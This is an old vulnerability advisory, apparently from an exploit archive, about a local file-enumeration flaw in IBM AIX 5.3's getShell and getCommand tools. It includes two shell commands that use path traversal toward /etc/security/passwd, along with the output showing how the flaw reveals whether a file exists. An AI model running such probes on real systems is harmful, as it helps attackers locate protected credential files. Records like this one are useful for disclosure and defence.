IBM AIX 5.3 GetShell and GetCommand File Enumeration Vulnerability

2005-12-30
ID: 56983
Download vulnerable application: None
source: http://www.securityfocus.com/bid/16102/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.

-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
1-4-2 (www02)